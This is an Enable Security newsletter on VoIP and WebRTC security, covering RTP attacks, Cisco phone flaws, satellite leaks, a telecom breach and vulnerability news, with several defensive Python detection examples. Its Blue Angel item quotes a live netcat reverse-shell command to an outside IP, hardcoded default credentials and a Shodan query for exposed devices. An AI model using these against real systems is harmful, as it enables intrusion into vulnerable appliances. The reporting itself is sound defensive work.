RTC Security Newsletter

Curated VoIP and WebRTC security news, research and updates by Enable Security.


October 2025: RTP attacks, Cisco VoIP phones, satellite leaks, and nation-state breaches

Published on Oct 31, 2025

Welcome to the October 2025 edition of RTCSec Newsletter. This month brings us deep discussions on RTP security, critical vulnerabilities in widely deployed VoIP phones, massive satellite communication leaks, and a telecom infrastructure breach that went undetected for nine months.

In this edition, we cover:

  • Our news: 2026 penetration testing bookings, OpenSIPIt meeting on RTP Bleed and Inject, and our VoIP eavesdropping defense guide
  • Cisco VoIP phone vulnerabilities: Balazs Bucsay’s detailed presentation on critical flaws including unauthenticated remote packet capture
  • Satellite link vulnerabilities: Research exposing massive unencrypted traffic from T-Mobile, AT&T, US military, and more
  • Ribbon Communications breach: Nine-month nation-state intrusion into a major telecom infrastructure provider
  • Blue Angel Software Suite: Active exploitation of hardcoded credentials and command injection affecting VoIP/SIP appliances
  • WebRTC and Matrix RTC: Privacy leaks research on cross-browser IP metadata exposure, plus Matrix security and encryption architecture improvements
  • Kamailio bogus CVEs: Why those configuration file vulnerabilities are nonsense
  • Security updates round-up: Cisco, FreePBX, Ubiquiti, Issabel, and data breach reports

The RTCSec newsletter is a free periodic newsletter bringing you commentary and news around VoIP and WebRTC security. We cover both defensive and offensive security as they relate to Real-time Communications.

What is RTC security anyway? Real-time communications security determines if you can safely communicate in real time - whether it be with other humans or machines.

You may sign up to receive the RTCSec newsletter here. If you like what we’re doing, you’re most welcome to:

  • Forward it to those who may find this newsletter particularly fruitful.
  • Let us know if there are any RTC security news items we should cover.

To view past issues, please visit our website at https://www.enablesecurity.com/newsletter/.


Our news

Planning security testing for 2026?

We’re taking bookings for VoIP and WebRTC penetration testing in 2026. Our calendar for Q1 and Q2 is filling up fast.

If you need security testing for your SIP infrastructure, WebRTC applications, or RTC environments, get in touch soon to secure your spot. We specialize in finding the vulnerabilities that generic security assessments miss - the ones specific to real-time communications that we write about in this newsletter every month.

Whether you’re running Asterisk, FreeSWITCH, Kamailio, a WebRTC platform, or a proprietary VoIP system, we’ve tested it (or something very similar). We know where to look.

OpenSIPIt live meeting about RTP attacks: Bleed and Inject

The OpenSIPIt team from Sippy Labs invited us to discuss RTP Bleed and RTP Inject, two persistent vulnerabilities affecting Real-time Transport Protocol implementations. We walked through the ClueCon presentation on these attacks (watch that here) before diving into mitigation strategies.

Maksym Sobolyev presented his approach to mitigating RTP Bleed using the SSRC Attribute from RFC 5576 (Source-Specific Media Attributes in the Session Description Protocol). The proposal adds the SSRC (Synchronization Source) media attribute to SDP to verify whether incoming RTP streams have a known SSRC. Razvan and I noted potential issues with this solution.

We also discussed a heuristic for detecting RTP attacks and blocking potential attackers. Nikolay Shakin presented a method particularly suitable for rtpengine (due to its kernel module), where a ratio of “good packets” (to open ports) to “bad packets” (to closed/honey ports) is calculated.
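To make the two defensive ideas above concrete, here is an added Python model written for this summary; it is not rtpengine's or Sippy Labs' code. It assumes a media server that knows which ports are allocated to calls and, where the SDP carried an a=ssrc line, the SSRC expected on each port; every unallocated port in the range serves as a closed/honey port. The threshold values are assumptions, and the traffic is constructed: one endpoint streaming to its own port, and a second source sending one packet to every port in the range.

```python
import struct
from collections import defaultdict

# Added example: two defensive checks for an RTP media server, modelled after the
# OpenSIPIt discussion. Not rtpengine's or Sippy Labs' code. Assumes the server
# knows its allocated ports and, where SDP carried a=ssrc (RFC 5576), the SSRC
# expected on each port; every unallocated port in the range acts as a honey port.

RTP_HEADER_LEN = 12


def build_rtp_packet(ssrc, seq, timestamp=0, payload_type=0, payload=b"\x00" * 4):
    """Build a minimal RTP packet (V=2, no padding/extension/CSRC). Test data only."""
    return struct.pack("!BBHII", 0x80, payload_type & 0x7F, seq, timestamp, ssrc) + payload


def parse_ssrc(packet):
    """Return the SSRC of an RTP v2 packet, or None if the bytes are not RTP."""
    if len(packet) < RTP_HEADER_LEN or (packet[0] >> 6) != 2:
        return None
    return struct.unpack("!I", packet[8:12])[0]


class MediaPortMonitor:
    """Per-source good/bad packet accounting over a media server's port range."""

    def __init__(self, open_ports, min_ratio=1.0, min_bad=10):
        # port -> expected SSRC (None if no a=ssrc was announced for that stream)
        self.open_ports = dict(open_ports)
        self.min_ratio = min_ratio    # good/bad ratio below this marks a source as hostile
        self.min_bad = min_bad        # assumed threshold: judge only after this many bad packets
        self.good = defaultdict(int)  # packets that reached an allocated port
        self.bad = defaultdict(int)   # packets that hit a closed/honey port

    def record(self, src_ip, dst_port, packet):
        """Account for one packet and return the verdict the server should apply."""
        if dst_port not in self.open_ports:
            self.bad[src_ip] += 1
            return "drop-closed-port"
        self.good[src_ip] += 1
        ssrc = parse_ssrc(packet)
        if ssrc is None:
            return "drop-not-rtp"
        expected = self.open_ports[dst_port]
        if expected is not None and ssrc != expected:
            # SSRC attribute check: the stream on this port announced a different SSRC.
            return "drop-unknown-ssrc"
        return "accept"

    def good_to_bad_ratio(self, src_ip):
        """Ratio of packets to open ports versus packets to honey ports for one source."""
        bad = self.bad[src_ip]
        return float("inf") if bad == 0 else self.good[src_ip] / bad

    def is_attacker(self, src_ip):
        """Sources that mostly hit honey ports are candidates for blocking."""
        return self.bad[src_ip] >= self.min_bad and self.good_to_bad_ratio(src_ip) < self.min_ratio


def demo():
    """Constructed traffic: one legitimate endpoint and one source hitting every port."""
    monitor = MediaPortMonitor({10000: 0x11223344, 10002: None})
    for seq in range(50):
        monitor.record("198.51.100.10", 10000, build_rtp_packet(0x11223344, seq))
    verdicts = {}
    for port in range(10000, 10100):
        verdicts[port] = monitor.record("203.0.113.7", port, build_rtp_packet(0xDEADBEEF, 1))
    return monitor, verdicts


if __name__ == "__main__":
    monitor, verdicts = demo()
    for ip in ("198.51.100.10", "203.0.113.7"):
        print(ip, "ratio", monitor.good_to_bad_ratio(ip), "attacker", monitor.is_attacker(ip))
```

The SSRC check only drops packets whose SSRC disagrees with what SDP announced; it does nothing for streams where no a=ssrc was exchanged, which is one reason the port-ratio heuristic is useful alongside it.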

Overall it was a valuable discussion for anyone implementing or developing media servers for RTP.

Watch the live meeting on YouTube.

VoIP eavesdropping: Defense tactics and threat analysis

We published a guide on our blog by Akash Gupta on defending against VoIP eavesdropping attacks. The article covers three attack categories:

  • Packet sniffing: Attackers use tools like Wireshark to capture unencrypted VoIP traffic and reassemble packets into audible conversations
  • MITM attacks: BGP hijacking to manipulate routing tables, or compromising routers to redirect traffic through attacker-controlled systems
  • RTP Bleed: An RTP vulnerability affecting media servers that allows eavesdropping on active calls

Defense measures include encrypting signaling with TLS and media streams with SRTP, using MFA for admin access, regular patching, quarterly penetration tests of SIP infrastructure, properly configured Session Border Controllers that validate SIP messages, dedicated VLANs for VoIP traffic, anomaly detection for suspicious SIP patterns, and VPNs for remote workers.

Read the full guide.

What’s happening?

Kamailio 5.5 vulnerabilities in config handler

Four CVEs were issued for Kamailio’s configuration parser: CVE-2025-12204, CVE-2025-12205, CVE-2025-12206, and CVE-2025-12207. The vulnerabilities are said to affect Kamailio 5.5, which is severely outdated (released back in 2021; the latest release on the 5.x branch is v5.7.7).

Here’s the problem: these “vulnerabilities” require loading malicious configuration files into Kamailio. If you’re loading malicious configuration files into your SIP server, you’ve already lost. The advisories aren’t even fully public - the configuration files to reproduce these issues are behind a login form that requires a Chinese phone number.

These advisories seem both bogus and irrelevant. Kamailio isn’t the only project hit by this nonsense. dnsmasq and other projects were targeted with similar questionable CVEs. The CVE issuer VulDb is not doing a great job at vetting this information.

List of all known Kamailio vulnerabilities

On the Kamailio mailing list, James Morisson asked if there is a list of all known Kamailio vulnerabilities, especially for version 5.3 or higher. Core developer Henning Westerholt responded with a link to the CVE website and wrote:

We recommend always updating production environments to the latest released versions of the current maintained stable branches, e.g. right now 5.8.x and 6.0.x without too much delay.

The conversation continued on backporting and why it isn’t a long-term feasible strategy for Kamailio because of breaking changes.

Worth noting: Kamailio frequently gets code changes that improve its security. These updates don’t get much attention from a vulnerability standpoint, but some of them likely fix exploitable vulnerabilities.

Is your phone spying on you? An in-depth analysis of vulnerabilities in Cisco VoIP phones - Balazs Bucsay

Balazs Bucsay of Mantra Information Security presented at BSides Dublin about serious vulnerabilities in Cisco VoIP phones deployed in thousands of organizations. The YouTube video of his talk is now available, and it doesn’t disappoint!

We previously covered these vulnerabilities when Cisco first issued their advisory in May 2024. Now with Bucsay’s detailed presentation, we get the full story behind these critical flaws.

The most critical vulnerability discovered is an unauthenticated remote packet capture capability. Attackers can remotely and without authentication use built-in API endpoints to start, stop, and download network traffic captures (tcpdump) from the phone. This allows for the interception of not only VoIP conversations but also all data from computers connected to the network through the phone.

Other significant findings include an unauthenticated Denial of Service (DoS) vulnerability that can trap the device in a reboot loop, and a buffer overflow that enables traffic interception via a malicious proxy. These vulnerabilities were found in stock firmware for devices similar to models observed being used in high-security locations like the White House.

Cisco has issued patches, but without an automated update mechanism, many devices likely remain vulnerable. Bucsay notes these discoveries are just the “tip of the iceberg” and uses the research to explore the messy, non-linear reality of security research. His talk raises hard questions about how such fundamental flaws persisted for years in a market-leading product. The state of device security is worrying.

In case you were wondering how this was reported in the Cisco advisory:

  • CVE-2024-20357 - Cisco IP Phone Unauthorized Access Vulnerability: This flaw allows an unauthenticated, remote attacker to send a crafted XML request to initiate phone calls or play sounds on an affected device.

  • CVE-2024-20376 - Cisco IP Phone Denial of Service (DoS) Vulnerability: An unauthenticated, remote attacker can send a crafted request to the web interface, causing the device to reload. This is also referred to as a .BSS Buffer Overflow.

  • CVE-2024-20378 - Cisco IP Phone Information Disclosure Vulnerability: A lack of authentication for certain endpoints allows an unauthenticated, remote attacker to retrieve sensitive information, capture user credentials, and record network traffic, including VoIP calls.

This research came from a collaboration between Balazs Bucsay (Mantra Information Security) and Liviu Rombaut and Peter Lemmens (Davinsi Labs). Excellent work.

Satellite link vulnerabilities: sensitive internal links in the clear on GEO satellites

Researchers from UC San Diego and University of Maryland published “Don’t Look Up: There Are Sensitive Internal Links in the Clear on GEO Satellites”, showing how GEO satellites leak sensitive data due to lack of network-level encryption. The paper won a Distinguished Paper Award at ACM CCS 2025.

As various people, including Kevin Karhan, have pointed out, this is not exactly new. In fact, we had presentations about this at cyber-security conferences before it was called cyber-security 😉. That doesn’t make it less important to publish this since one could easily assume that this is a thing of the past.

I’ll quote Vinoth Deivasigamani here so that the audience of this newsletter understands why this caught our eye:

This is insane! A few researchers from UCSD and UMCP scanned a bunch of satellite links, found much of the traffic is not encrypted, and went on to decode them. It’s amazing what came out.

  • T-Mobile backhaul: Users’ SMS, voice call contents and internet traffic content in plain text.
  • AT&T Mexico cellular backhaul: Raw user internet traffic
  • TelMex VOIP on satellite backhaul: Plaintext voice calls
  • U.S. military: SIP traffic exposing ship names
  • Mexico government and military: Unencrypted intra-government traffic
  • Walmart Mexico: Unencrypted corporate emails, plaintext credentials to inventory management systems, inventory records transferred and updated using FTP

While it is important to work on futuristic threats such as Quantum cryptanalysis, backdoors in standardized cryptographic protocols, etc. - the unfortunate reality is that the vast majority of real-world attacks happen because basic protection is not enabled. Let’s not take our eyes off the basics.

Great work, Wenyi Zhang, Annie Dai, Keegan Ryan, Dave Levin, Nadia Heninger and Aaron Schulman!

Ribbon Communications nation-state breach

Hot off the press:

Ribbon Communications, a Texas-based telecom infrastructure provider, disclosed a nation-state breach that went undetected for almost nine months. The company discovered unauthorized access to its IT network in early September 2025, but evidence shows the threat actor may have gained initial access as early as December 2024.

The attackers accessed four customer files stored on two laptops outside Ribbon’s main network. Three smaller customers were notified, though Ribbon hasn’t named them or identified their sectors. The company says there’s no evidence the attackers accessed material information or infiltrated customer systems directly.

This matters because Ribbon provides telecommunications infrastructure to major carriers (Verizon, AT&T, BT, Deutsche Telekom, Comcast, CenturyLink) and the US Department of Defense. The company also serves financial institutions including Bank of America, JPMorgan Chase, and Wells Fargo. We often see Ribbon SBCs in our work.

Ribbon disclosed the breach in its SEC 10-Q filing on October 23, 2025. The company worked with federal law enforcement and third-party cybersecurity experts to investigate and believes the threat actor has been removed from its network.

No attribution was provided, but security analysts noted similarities to the Salt Typhoon campaign, the China-linked espionage group that compromised multiple US telecom providers including AT&T, Verizon, and Lumen.

Further coverage:

Blue Angel Software Suite: Active exploitation of hardcoded credentials and command injection

Two vulnerabilities in the Blue Angel Software Suite are being actively exploited in the wild. The first is a hardcoded credentials vulnerability (CVE-2025-34034, CVSS 9.3) that provides administrative access using default/backdoor accounts (Exploit-DB’s PoC includes blueangel:blueangel, guest:guest and other hardcoded credentials). The second is a command injection flaw (CVE-2025-34033) in the /cgi-bin/webctrl.cgi endpoint that allows authenticated attackers to execute arbitrary commands as root through the ping functionality.

Note: recent attacks seen in the wild use a POST to action=pingconfig_update with the ipaddress parameter (SANS honeypots), while NVD references ping_addr in a GET to pingtest_update - both are command-injection variants of the same underlying bug.

Public exploit code has been available since 2019 (Exploit-DB EDB-46792). SANS honeypots detected active exploitation starting October 21, 2025, with attackers using netcat reverse shells (nc 87.120.191.94 31331 -e/bin/sh) injected into the ipaddress parameter. Shadowserver’s dashboard shows ongoing scanning and exploitation activity.

What’s being exploited:

The Blue Angel Software Suite from 5V Technologies (Taiwan) is an embedded software stack OEM-bundled into VoIP/SIP appliances, broadband CPE, and white-label network devices. The vulnerability chain works like this: attackers use hardcoded credentials to authenticate, then exploit insufficient input validation in the ping command to inject shell commands.
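For defenders watching a Blue Angel management interface, the request shapes described above translate into a simple detection rule. The Python below is an added example for this newsletter, not code from 5V Technologies, SANS or Shadowserver. It assumes you can see each request's method, target, body and authenticated username, for instance from a reverse proxy or honeypot placed in front of the device; the parameter and action names come from the reports above, and the log records are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Added detection example for the Blue Angel webctrl.cgi command injection and
# default-account abuse. Not vendor code. Assumes request method, target, body and
# the authenticated username are available (reverse proxy or honeypot capture).

MANAGEMENT_ENDPOINT = "/cgi-bin/webctrl.cgi"
PING_ACTIONS = {"pingconfig_update", "pingtest_update"}   # actions named in the reports
PING_TARGET_PARAMS = {"ipaddress", "ping_addr"}            # parameters named in the reports
DEFAULT_ACCOUNTS = {"blueangel", "guest"}                  # hardcoded accounts from the PoC

# A ping target should be a bare IP or hostname; anything else is not legitimate input.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def is_plain_host(value):
    """True if value is an IP literal or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))


def inspect_request(method, target, body="", user=None):
    """Return a list of findings for one HTTP request; empty if nothing is suspicious."""
    findings = []
    parts = urlsplit(target)
    if not parts.path.endswith(MANAGEMENT_ENDPOINT):
        return findings
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST" and body:
        # Merge form-encoded body parameters with the query string (both variants seen).
        for name, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)
    action = params.get("action", [""])[0]
    if action in PING_ACTIONS:
        for name in sorted(PING_TARGET_PARAMS):
            for value in params.get(name, []):
                if not is_plain_host(value):
                    findings.append(f"{action}: '{name}' is not a plain host: {value!r}")
    if user and user.lower() in DEFAULT_ACCOUNTS:
        findings.append(f"management request authenticated as default account '{user}'")
    return findings


def scan(records):
    """Run inspect_request over (method, target, body, user) tuples; keep non-empty results."""
    return {i: f for i, rec in enumerate(records) if (f := inspect_request(*rec))}


# Constructed records: a normal ping, an injection-shaped value under a default account,
# a default-account request on the GET variant, and unrelated traffic.
SAMPLE_RECORDS = [
    ("POST", "/cgi-bin/webctrl.cgi?action=pingconfig_update", "ipaddress=192.0.2.10", "admin"),
    ("POST", "/cgi-bin/webctrl.cgi?action=pingconfig_update",
     "ipaddress=192.0.2.10%3B+echo+canary", "blueangel"),
    ("GET", "/cgi-bin/webctrl.cgi?action=pingtest_update&ping_addr=host.example.net", "", "guest"),
    ("GET", "/index.html", "", None),
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_RECORDS).items():
        print(index, findings)
```

Allow-listing the ping target (an IP literal or a syntactic hostname, nothing else) is more robust than searching for specific shell metacharacters, and the same allow-list is what the device firmware should have applied before passing the value to ping.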

Affected device types:

  • VoIP/SIP appliances (SIP gateways, VoIP PBX systems, session border controllers with web management interfaces)
  • Broadband CPE and router-class appliances using Blue Angel for management utilities
  • White-label embedded devices from multiple manufacturers

The Shodan query http.html:"/cgi-bin/webctrl.cgi" returns numerous potentially vulnerable devices.

Matrix Real-Time Communication (RTC) technology update

Timo Kandra, VoIP engineer at Element, gave an excellent talk on MatrixRTC updates covering security and encryption architecture improvements for Matrix’s real-time communications.

Key topics covered:

  • Security and encryption architecture evolution in MatrixRTC
  • How key distribution works for real-time Matrix sessions
  • Integrating Element Call into clients using the Rust or JS-SDK
  • Practical implementation details for bringing encrypted calling to Matrix users

If you’re building Matrix clients or interested in how Matrix handles secure real-time communications, this talk provides technical details on the current state of MatrixRTC.

Alternative link to details.

WebRTC privacy leaks: Cross-browser IP metadata exposure study

A new paper from Istanbul Aydin University examines how WebRTC continues to leak metadata and IP addresses through the Interactive Connectivity Establishment (ICE) process, even in 2025.

Key takeaways:

  • Persistent leakage: All tested browsers except Tor expose some form of identifying metadata. This occurs silently, without user consent, and can be exploited for tracking, fingerprinting, and network reconnaissance.

  • Desktop vs. mobile divergence: A significant privacy disparity exists between desktop and mobile platforms. Modern desktop browsers have largely mitigated direct Local Area Network (LAN) IP leakage, but mobile versions of Chrome and Firefox continue to expose these addresses by default.

  • mDNS as a new fingerprinting vector: To replace direct LAN IPs, Chromium-based browsers (Chrome, Brave) now expose Multicast DNS (mDNS) .local hostnames. While this obfuscates the internal IP, these identifiers are often stable within a browsing session, creating a new vector for short-term user fingerprinting.

  • Novel CGNAT leakage threat: The study identifies a previously underexamined threat on mobile 4G networks. Android versions of Chrome and Firefox leak Carrier-Grade NAT (CGNAT) internal IP addresses (10.x.x.x), which can serve as a stable, subscriber-level identifier for tracking users at the Internet Service Provider (ISP) level.

  • Browser protection hierarchy: The research establishes a clear hierarchy of privacy protection among major browsers:

    1. Tor Browser: Consistently prevents all forms of IP and metadata leakage across all platforms.

    2. Firefox (Desktop): Offers the strongest protection outside of Tor, emitting pseudo-candidates that conceal both LAN and mDNS identifiers.

    3. Brave: Hides internal LAN/CGNAT IPs but still leaks session-stable mDNS identifiers.

    4. Chrome & Firefox (Mobile): Exhibit the weakest privacy posture, leaking direct LAN IPs on Wi-Fi and CGNAT IPs on mobile networks.

The findings demonstrate that WebRTC privacy risks have evolved rather than been resolved. The threat has shifted from overt LAN IP exposure on desktops to more subtle vectors like mDNS and CGNAT leakage, with mobile platforms lagging dangerously behind in protection.
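One way to audit what your own WebRTC application exposes is to classify the ICE candidates it gathers. The Python below is an added example, not code from the paper, and assumes candidate lines in the standard SDP candidate: form (for instance as collected from RTCPeerConnection's onicecandidate in a test page); the sample lines are constructed. It classifies by address range only: the 10.x.x.x addresses the study reports on 4G fall into the RFC 1918 private range here, and only 100.64.0.0/10 (the RFC 6598 shared address space) is labelled as CGNAT.

```python
import ipaddress
import re

# Added example: classify ICE candidate lines by what their address reveals.
# Assumes the standard SDP "candidate:" syntax (RFC 8839), as emitted by
# RTCPeerConnection's onicecandidate. Sample lines below are constructed.

CANDIDATE_RE = re.compile(
    r"candidate:(?P<foundation>\S+)\s+(?P<component>\d+)\s+(?P<transport>\S+)\s+"
    r"(?P<priority>\d+)\s+(?P<address>\S+)\s+(?P<port>\d+)\s+typ\s+(?P<type>\S+)"
)
# RFC 6598 shared address space used by many carriers for CGNAT.
CGNAT_SHARED = ipaddress.ip_network("100.64.0.0/10")


def classify_candidate(line):
    """Return a label describing what the candidate's address exposes."""
    match = CANDIDATE_RE.search(line)
    if not match:
        return "unparsed"
    address = match.group("address")
    if address.endswith(".local"):
        # Chromium's mDNS obfuscation: no IP, but a session-stable hostname.
        return "mdns-hostname"
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return "other-hostname"
    if ip.is_loopback or ip.is_link_local:
        return "local-only"
    if ip in CGNAT_SHARED:
        return "cgnat-shared-ip"
    if ip.is_private:
        # RFC 1918 space; a carrier-assigned 10.x.x.x address lands here too.
        return "private-ip"
    return "public-ip"


def leak_report(lines):
    """Count candidates per label for one gathering session."""
    report = {}
    for line in lines:
        label = classify_candidate(line)
        report[label] = report.get(label, 0) + 1
    return report


def leak_severity(report):
    """Map a report onto the paper's hierarchy: internal IP > mDNS id > nothing."""
    if report.get("private-ip") or report.get("cgnat-shared-ip"):
        return "exposes internal address"
    if report.get("mdns-hostname"):
        return "exposes session-stable mDNS identifier"
    return "no internal identifiers"


# Constructed candidates: a Wi-Fi LAN host, a Chromium mDNS host, a server-reflexive
# candidate with a public address (8.8.8.8 stands in for the client's real one), and
# a host candidate from the CGNAT shared range.
SAMPLE_CANDIDATES = [
    "candidate:1 1 udp 2122260223 192.168.1.23 51000 typ host",
    "candidate:2 1 udp 2122194687 1f2e3d4c-5b6a-7980-1a2b-3c4d5e6f7a8b.local 51001 typ host",
    "candidate:3 1 udp 1686052607 8.8.8.8 51000 typ srflx raddr 0.0.0.0 rport 0",
    "candidate:4 1 udp 2122260223 100.64.12.34 51002 typ host",
]

if __name__ == "__main__":
    report = leak_report(SAMPLE_CANDIDATES)
    print(report, "->", leak_severity(report))
```

Running this against candidates gathered on each browser and platform you support reproduces the comparison the paper makes, and a report that never leaves "no internal identifiers" is a reasonable acceptance test for an application that restricts candidate gathering (for example by relaying media through TURN only).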

My opinion:

The nature of WebRTC, or any protocol that needs to support peer-to-peer real-time communications, conflicts with certain privacy requirements. This involves an important tradeoff.

How does Tor Browser solve this? Well, Tor Browser is built without WebRTC and also ships with preferences that keep it off at build time.

Security updates and vulnerability news round-up

Cisco BroadWorks CommPilot XSS vulnerability (CVE-2025-20307)

Cisco BroadWorks CommPilot Application Software has a Cross-Site Scripting vulnerability tracked as CVE-2025-20307. Exploitation requires administrator authentication, making this medium severity. Thanks to Miguel Guerrero and Pablo Sanchez from CovertSwarm Limited for reporting this issue.

Original content here.

Cisco IP Phone DoS and XSS vulnerabilities (CVE-2025-20350, CVE-2025-20351)

Cisco Desk Phone 9800, IP Phone 7800/8800, and Video Phone 8875 are affected by two vulnerabilities: CVE-2025-20350 (DoS) and CVE-2025-20351 (XSS). The DoS is caused by a buffer overflow in the web interface that forces affected phones to reload. Web Access must be enabled for exploitation, which is disabled by default. Kent Yoder of Cisco’s Advanced Security Initiatives Group (ASIG) discovered these during internal security testing.

Original content here.

Ubiquiti UniFi Talk debugging vulnerability (CVE-2025-52663)

UniFi Talk Touch, Talk Touch Max, and Talk G3 series devices have debugging functions left active, tracked as CVE-2025-52663. The vulnerability allows remote exploitation via management network access through exposed debug APIs. Discovered by security researchers Bongeun Koo (@kiddo_pwn, STEALIEN) and Junhyung Cho (@da2rim). Koo is a regular Pwn2Own competitor who recently exploited a Ubiquiti EV charger at Pwn2Own Automotive 2025.

Original content here.

Cisco RoomOS information disclosure vulnerability (CVE-2025-20329)

Cisco TelePresence CE and RoomOS have an information disclosure vulnerability (CVE-2025-20329, CVSS 4.9) where sensitive information leaks in logs. The vulnerability requires valid administrative credentials for exploitation. When SIP media logging is enabled, credentials are stored unencrypted and can be disclosed through this vulnerability.

Original content here.

FreePBX Endpoint Manager arbitrary file upload vulnerability (CVE-2025-61678)

FreePBX Endpoint Management module has an arbitrary file upload vulnerability (CVE-2025-61678, CVSS 8.6) via the fwbrand parameter. Affects FreePBX 16 before 16.0.92 and FreePBX 17 before 17.0.6. Requires authenticated access with high-level privileges and can deploy webshells on the system—the type of vulnerability typically chained for full exploitation. Update to 16.0.92 or 17.0.6.

Original content here.

FreePBX XSS vulnerability enables admin session hijacking (CVE-2025-59429)

A reflected XSS vulnerability (CVE-2025-59429) exists on the Asterisk HTTP Status page (port 8089) that enables admin session hijacking. Affects FreePBX versions before 16.0.68.39 and 17.0.18.38. Update to patched versions.

Original content here.

Cisco Unified Communications Manager stored XSS vulnerability (CVE-2025-20361)

Cisco Unified CM and CM SME web management interface has a stored XSS vulnerability (CVE-2025-20361, CVSS 4.8). Exploitation requires valid administrative credentials, resulting in the medium severity rating.

Original content here.

Issabel PBX multiple XSS vulnerabilities (CVE-2025-40647, CVE-2025-40648)

Issabel PBX v5.0.0 has two stored XSS vulnerabilities discovered by Oriol Vilella Jam. CVE-2025-40647 (CVSS 5.1) affects the issabel-pbx module via the email parameter in the address book. CVE-2025-40648 (CVSS 4.8) affects the issabel-agenda module via the numero_conferencia parameter in conference settings. Patched in issabel-pbx v5.0.0-2 and issabel-agenda v5.0.0-4.

Original content here.

Hello Gym data breach: 1.6M audio files expose member PII

Hello Gym exposed 1.6 million audio files containing internal calls and member personal information. The call recordings included sensitive member data, likely from a storage repository for VoIP audio files intended for internal use.

Where you store your VoIP data matters.

Original content here.

Huddle01 data leak: Kafka broker exposes 600K+ user records

Huddle01’s WebRTC video calling platform exposed 621,000+ log entries through an unprotected Kafka broker. The leaked data includes usernames, emails, crypto wallet details, IP addresses, and meeting metadata.

WebRTC’s security features don’t help if you’re logging everything to an unprotected database.

Original content here.

Nuclei adds detection for Mitel MiCollab SQLi vulnerability (CVE-2024-35286)

ProjectDiscovery added a Nuclei template for detecting CVE-2024-35286, a critical SQL injection in Mitel MiCollab NuPoint Messenger that was exploited in the wild. The template enables security teams to scan for this severe vulnerability using the Nuclei scanner.

Original content here.

Sidecar: Privacy-preserving call metadata transmission protocol

Researchers published a paper addressing STIR/SHAKEN security limitations when calls hit legacy SS7/TDM or SIP hops that strip headers and break attestation. The current “out-of-band” industry fix (OOB S/S) pushes PASSporTs and call metadata into third-party databases in the clear, allowing any participating intermediary to see who’s calling whom and when—a privacy and trade-secret nightmare.

Sidecar proposes a privacy-preserving, out-of-band channel that accompanies each call to solve this problem.

Original content here.


Thanks to Vulners and other third parties for providing vulnerability source material.

This newsletter was prepared by Sandro Gauci and the Enable Security team for RTCSec newsletter subscribers. If you have someone in mind who would benefit from our content, please share.

To subscribe: here
